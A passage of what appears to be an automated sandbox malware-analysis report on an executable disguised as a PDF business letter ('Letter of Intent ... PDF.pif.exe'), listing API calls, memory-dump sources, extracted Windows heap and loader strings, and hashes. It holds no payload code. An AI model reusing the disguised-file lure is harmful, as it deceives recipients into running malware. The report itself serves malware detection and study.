                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00404F9D
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE
                                                                                        • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,0040365D,0040349F,?), ref: 0040369F
                                                                                      • GlobalFree.KERNEL32(?), ref: 004036A6
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403697
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-3081826266
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-224404859
                                                                                      APIs
                                                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloclstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 852173138-0
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 0040595C
                                                                                      • CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0

                                                                                      Execution Graph

                                                                                      Execution Coverage:0%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:100%
                                                                                      Total number of Nodes:1
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 77320 32fd2c70 LdrInitializeThunk

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2 32fd35c0-32fd35cc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 32fd2c70-32fd2c7c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1 32fd2df0-32fd2dfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: df252a3fbf20ba61d8130538d7c2ebb3e09648fa3f7f3e0ce9bac8505147db61
                                                                                      • Instruction ID: 0d4413dacd8f8e01b47684155e1fd37f32bd5f315eec7e0a745f278464cf4c45
                                                                                      • Opcode Fuzzy Hash: df252a3fbf20ba61d8130538d7c2ebb3e09648fa3f7f3e0ce9bac8505147db61
                                                                                      • Instruction Fuzzy Hash: BE90023120140423D11271589604707000947D0641F95C813A1434519D96568A56A162

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $ $0
                                                                                      • API String ID: 3446177414-3352262554
                                                                                      • Opcode ID: 3683cdad48500237d1b2db13892c0118c7720f68a5a4971e715db05b622dfe84
                                                                                      • Instruction ID: b2ad119a25135dbb3e2f50faa9df759b75165b322253ebff6649864efdb37ff0
                                                                                      • Opcode Fuzzy Hash: 3683cdad48500237d1b2db13892c0118c7720f68a5a4971e715db05b622dfe84
                                                                                      • Instruction Fuzzy Hash: 413221B1A093818FE350CF68C884B5BBBE4BF89354F04496EF5D987290D775E948CB52

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                      • API String ID: 3446177414-1700792311
                                                                                      • Opcode ID: 67f18648a8b42b79c433ccca4874981ce5c31f977cbbec8a0926bbc79b6d08fb
                                                                                      • Instruction ID: 3d51d056fb4edc25a8ba27cb67113901398998067ce1d3e73a8264c2a2aaf21e
                                                                                      • Opcode Fuzzy Hash: 67f18648a8b42b79c433ccca4874981ce5c31f977cbbec8a0926bbc79b6d08fb
                                                                                      • Instruction Fuzzy Hash: A7D1FE75900685DFDB02DF68C540AAEFBF1FF49710F4888A9E585AB662C7389A81CF14
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 3446177414-1745908468
                                                                                      • Opcode ID: 58146b76f4db5636b3089599358493023e17e55361792c8f0692ec4770792c52
                                                                                      • Instruction ID: 25c9553b7031d52d425c638b73fc291e298a6ef873a7e68e50558c9c196e9347
                                                                                      • Opcode Fuzzy Hash: 58146b76f4db5636b3089599358493023e17e55361792c8f0692ec4770792c52
                                                                                      • Instruction Fuzzy Hash: 8A912135902740DFEB01CF68C440AAEFBF2FF4A724F1889D9E599AB261CB759941CB14
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                      • API String ID: 0-3591852110
                                                                                      • Opcode ID: bb62a23bc692f1339115c2154efce4c165062093e1450cb4866c822cd76f2de8
                                                                                      • Instruction ID: adcd172cc7250c5a169f173bfa41b8349e6d0ef3d578f7fe452fa56076fc2f4f
                                                                                      • Opcode Fuzzy Hash: bb62a23bc692f1339115c2154efce4c165062093e1450cb4866c822cd76f2de8
                                                                                      • Instruction Fuzzy Hash: 01129B74600742EFE7198F26C440BBABBF5EF09354F5888E9E5968BA51D734EA80CF50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                      • API String ID: 0-3532704233
                                                                                      • Opcode ID: 336310774e5567d5193eecc21c03f150a0e01cf7faa1821d0bceee49c16189ae
                                                                                      • Instruction ID: a5e3f39e50a1d01967053a3f2c2e0d632ee281ad96b26825132ffc17681cebff
                                                                                      • Opcode Fuzzy Hash: 336310774e5567d5193eecc21c03f150a0e01cf7faa1821d0bceee49c16189ae
                                                                                      • Instruction Fuzzy Hash: D0B19BB65083559FD715CF24C880B5BB7E8AF88798F414D2EFA99D7240DB70DA08CB92
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 3446177414-3570731704
                                                                                      • Opcode ID: dfee129700bb8a6ee2a199de2f1f94d42e82faa5c7b207b00165d7feca15eb1e
                                                                                      • Instruction ID: 58c446e4c77132ed6a82de8e439acd36dc7a61f9482412820bf4127fb5b5f7d9
                                                                                      • Opcode Fuzzy Hash: dfee129700bb8a6ee2a199de2f1f94d42e82faa5c7b207b00165d7feca15eb1e
                                                                                      • Instruction Fuzzy Hash: 9B927B75A00328DFEB24DF18C850F9AB7B5BF44754F0689EADA49A7290DB709E80CF51
                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 32FBD959
                                                                                        • Part of subcall function 32F94859: RtlDebugPrintTimes.NTDLL ref: 32F948F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1975516107
                                                                                      • Opcode ID: f6ef514482c682dfd48b89d1bd4a4de6d5ea22d5e2ecf20c6b7a9b4f636e89d0
                                                                                      • Instruction ID: 060179dd0799cd88521671219a3686ff42d1e2e3f42cefe98da1611253cfce75
                                                                                      • Opcode Fuzzy Hash: f6ef514482c682dfd48b89d1bd4a4de6d5ea22d5e2ecf20c6b7a9b4f636e89d0
                                                                                      • Instruction Fuzzy Hash: 4F51FC76A003499FEF04DFA5C490B8DBBF1BF48718F244969CA056B291DBB5E842CF81
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                      • API String ID: 3446177414-3224558752
                                                                                      • Opcode ID: c670425ea54f7fd3a5b5048d9f5445295a15d9fe326e7885ba39f7ad014861cf
                                                                                      • Instruction ID: 6e7c80089be857935562a5642d415d074e7e60053a4ca174604456c529127fe2
                                                                                      • Opcode Fuzzy Hash: c670425ea54f7fd3a5b5048d9f5445295a15d9fe326e7885ba39f7ad014861cf
                                                                                      • Instruction Fuzzy Hash: 96412775A00744EFEB01CF25C494B5AB7F4EF45768F108EA9EB01976A0CF79A880CB91
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                      • API String ID: 3446177414-1222099010
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                      • API String ID: 0-3063724069
                                                                                      Strings
                                                                                      • @, xrefs: 32F8D0FD
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 32F8D262
                                                                                      • @, xrefs: 32F8D2AF
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 32F8D146
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 32F8D2C3
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 32F8D196
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 32F8D0CF
                                                                                      • @, xrefs: 32F8D313
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                      • API String ID: 0-1356375266
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-4253913091
                                                                                      Strings
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 330002E7
                                                                                      • RTL: Re-Waiting, xrefs: 3300031E
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 330002BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      Strings
                                                                                      • WindowsExcludedProcs, xrefs: 32FB522A
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 32FB5247
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 32FB527B
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 32FB542B
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 32FB5352
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                      • API String ID: 0-3061284088
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
